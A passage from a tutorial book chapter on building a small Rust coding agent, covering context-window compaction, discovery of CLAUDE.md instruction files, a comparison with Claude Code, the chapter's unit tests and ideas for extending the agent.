The reconstructed vector is [head, summary, ...recent]. A 40-message
conversation collapses to roughly 1 + 1 + preserve_recent messages.
The /= 3 token reset
After compaction we cannot know exactly how many tokens the new history uses without re-tokenising. But we know the new history is much shorter than the old one, so continuing to accumulate against the pre-compaction total would trigger another compaction immediately. A rough proxy:
```rust
self.tokens_used /= 3;
```
Empirically, compacting a long history down to [system, summary, N recent]
reduces token count by roughly 3–5×. Dividing by 3 is a conservative estimate
that keeps the agent running until the real token count climbs back to the
budget. A more precise implementation would re-count tokens from the new
messages vector; the proxy is good enough for the starter and keeps the
code simple.
Why summarise instead of truncate?
The obvious alternative is to drop old messages outright. That is cheap (no extra LLM call) but loses information. If the user said "use snake_case throughout" on turn 3 and you drop it on turn 40, the agent forgets. A summary preserves the decisions and facts from the dropped range at the cost of one extra LLM roundtrip per compaction. Since compactions are rare, the tradeoff favours the summary.
Why a system message for the summary rather than a user or assistant one? Because the summary is meta-context, not something either speaker said. System framing tells the LLM "this is background, not an active speaking turn", which matches how it is meant to be used.
How Claude Code does it
Claude Code discovers CLAUDE.md files by walking up from the working directory, following the same upward-walk pattern we implemented. But its instruction system is more elaborate in several ways.
User-level instructions. Claude Code supports ~/.claude/CLAUDE.md as a
global instruction file. Our InstructionLoader achieves the same effect
naturally: if the upward walk reaches the home directory and finds a CLAUDE.md,
it gets included. No special case needed.
Settings-based tool rules. Claude Code's .claude/settings.json specifies
per-tool permission rules. These configure the permission engine (Chapter 13),
not the prompt. Our Config keeps it simpler with allowed_directory,
protected_patterns, and blocked_commands.
Memory files. Claude Code supports persistent memory that accumulates facts across sessions. Memory is loaded alongside instructions but managed separately. Our book stops before memory, but the instruction loader is the natural hook point for extending into it.
Instruction validation. Claude Code warns when instructions at different levels contradict each other. Our implementation trusts the LLM to resolve contradictions using the root-first ordering -- the more specific instruction wins because it appears later.
The core pattern is identical: discover files, load them in order, inject as dynamic prompt sections. Everything else is refinement.
Tests
Run the tests:
cargo test -p mini-claw-code-starter instructions # InstructionLoader
cargo test -p mini-claw-code-starter context_manager # ContextManager
Note: InstructionLoader tests live in instructions (built in Chapter 8 and
revisited here). ContextManager tests live in context_manager (added in
this chapter).
Key InstructionLoader tests (instructions):
- test_instructions_discover_in_current_dir -- Finds a CLAUDE.md in the start directory.
- test_instructions_discover_in_parent -- Walks upward and finds a CLAUDE.md in the parent directory.
- test_instructions_no_files_found -- Returns an empty list when no instruction files exist anywhere in the path.
- test_instructions_load_content -- `load()` returns `Some` with the file content included.
- test_instructions_load_empty_file -- `load()` returns `None` for an empty CLAUDE.md (no wasted tokens).
- test_instructions_multiple_file_names -- Discovers both `CLAUDE.md` and `.mini-claw/instructions.md` in the same directory.
- test_instructions_system_prompt_section -- `system_prompt_section()` wraps content with a "project instructions" header.
- test_instructions_default_files -- `default_files()` constructor does not panic.
Key context tests (context_manager):
- test_context_manager_below_threshold_no_compact -- Context manager does not trigger compaction when below the token threshold.
- test_context_manager_triggers_at_threshold -- Compaction triggers when recorded tokens exceed the threshold.
- test_context_manager_compact_preserves_system_prompt -- After compaction, the system prompt remains as the first message.
- test_context_manager_compact_preserves_recent -- The most recent N messages survive compaction intact.
Key takeaway
Instructions are injected once at session start and compaction runs on demand
mid-session. The system message at messages[0] is the anchor: it carries the
instructions that differentiate this project from any other, and it survives
every compaction unchanged so the agent never loses its grounding.
Recap
This chapter connected three pieces:
- `InstructionLoader` discovers CLAUDE.md files by walking up the filesystem and concatenates them root-first with headers and separators. Global preferences come first, subdirectory overrides come last.
- `Config.instructions` supplies an optional second block of instructions from the layered config built in Chapter 17. It gets appended after the file-based block, so it has the final word.
- `ContextManager` tracks token usage and compacts the middle of the message history into an LLM-generated summary when the budget is exceeded. It preserves the leading system message (your instructions) and the trailing `preserve_recent` messages (your current conversational context).
The startup pipeline is: discover instruction files, build a Message::System
with their concatenated content, optionally append another Message::System
from Config.instructions, then run the normal agent loop. After every
provider turn the loop calls record and maybe_compact; in a short session
compaction never fires, in a long one it fires as many times as needed.
Where to go from here
This is the last chapter in the current series. The foundations are now in place: messages, provider, tools, agent loop, prompt, permissions, safety, hooks, plan mode, settings, and instructions.
Natural extensions to explore on your own:
- Persistent memory -- facts the agent learns in one session and recalls in the next. Memory files load alongside instructions, but they are managed differently: instructions are authored by humans, memory is authored by the agent itself.
- Token and cost tracking -- instrumenting the provider to aggregate per-session token usage and surface it in the TUI.
- Smarter compaction -- our `ContextManager` uses a single summary pass and a rough `/= 3` token reset. Production-grade alternatives include hierarchical summaries (summary of summaries) and re-tokenising the new history for an exact count.
- Sessions and resume -- serializing the message history to disk so a conversation can be paused and resumed.
- MCP (Model Context Protocol) -- loading tools from external MCP servers at runtime instead of hardcoding them at startup.
- Subagents -- spawning child agents with a filtered tool set for scoped subtasks.